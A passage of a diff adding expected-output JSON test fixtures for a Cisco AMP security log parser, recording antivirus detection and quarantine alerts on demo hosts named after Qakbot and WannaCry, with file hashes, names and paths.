"test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 698000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411525251028484000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 9463, + "related.hash": [ + "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:59:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6411525251028484105", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 214000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411525251028484000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "6894b3834bd541fa85df79e44568acac", + "file.hash.sha1": "8cf0ca99a8f5019d8583133b9a9379299c45470c", + "file.hash.sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "file.name": "MspthrdHash.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 10645, + "related.hash": [ + "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "6894b3834bd541fa85df79e44568acac", + "8cf0ca99a8f5019d8583133b9a9379299c45470c" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:59:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6411525251028484104", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 183000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411525251028484000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "6894b3834bd541fa85df79e44568acac", + "file.hash.sha1": "8cf0ca99a8f5019d8583133b9a9379299c45470c", + "file.hash.sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "file.name": "MspthrdHash.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 12021, + "related.hash": [ + "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "6894b3834bd541fa85df79e44568acac", + "8cf0ca99a8f5019d8583133b9a9379299c45470c" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:59:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411525251028484104", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 698000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411525251028484000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 13397, + "related.hash": [ + "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:55:47.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419264043361501262", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 888000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419264043361501000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 14506, + "related.hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:55:47.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229331435814969", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 779000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419264043361501000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 15718, + "related.hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:55:47.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419204905956802579", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 716000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419264043361501000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 16930, + "related.hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:55:47.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419264043361501261", + "cisco.amp.event_type_id": 553648155, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 888000000, + "event.action": "Retrospective Quarantine", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419264043361501000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 18142, + "related.hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:55:47.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Ransom:Gen.20gl.1201", + "cisco.amp.detection_id": "6419264043361501262", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 872000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419264043361501000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "file.name": "u.wnry", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 19266, + "related.hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:55:47.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Ransom:Gen.20gl.1201", + "cisco.amp.detection_id": "6419264043361501261", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 872000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419264043361501000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.md5": "7bf2b57f2a205768755c07f238fb32cc", + "file.hash.sha1": "45356a9dd616ed7161a3b9192e2f318d0ab5ad10", + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "file.name": "@WanaDecryptor@.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\@WanaDecryptor@.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 20509, + "related.hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "7bf2b57f2a205768755c07f238fb32cc", + "45356a9dd616ed7161a3b9192e2f318d0ab5ad10" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:55:47.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Ransom:Gen.20gl.1201", + "cisco.amp.detection_id": "6419229331435814969", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 763000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419264043361501000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "file.name": "u.wnry", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 21869, + "related.hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:55:47.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Ransom:Gen.20gl.1201", + "cisco.amp.detection_id": "6419204905956802579", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 716000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419264043361501000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "file.name": "u.wnry", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 23112, + "related.hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:55:46.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229322845880359", + "cisco.amp.error.description": "Cannot delete", + "cisco.amp.error.error_code": 3221225761, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 718000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419264039066534000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 24355, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:55:46.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419264039066533964", + "cisco.amp.event_type_id": 553648155, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 765000000, + "event.action": "Retrospective Quarantine", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419264039066534000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 25559, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:55:46.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Gen.20gl.1201", + "cisco.amp.detection_id": "6419264039066533964", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 749000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419264039066534000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.md5": "54a116ff80df6e6031059fc3036464df", + "file.hash.sha1": "61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\Windows\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 26683, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "54a116ff80df6e6031059fc3036464df", + "61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:55:46.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Gen.20gl.1201", + "cisco.amp.detection_id": "6419229322845880359", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 702000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419264039066534000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.md5": "54a116ff80df6e6031059fc3036464df", + "file.hash.sha1": "61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\Windows\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 28003, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "54a116ff80df6e6031059fc3036464df", + "61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:35:01.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6412622782676336648", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 729000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412622782676337000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 29323, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:35:01.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6412622782676336647", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 729000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412622782676337000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 30524, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:35:01.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6412622782676336646", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + 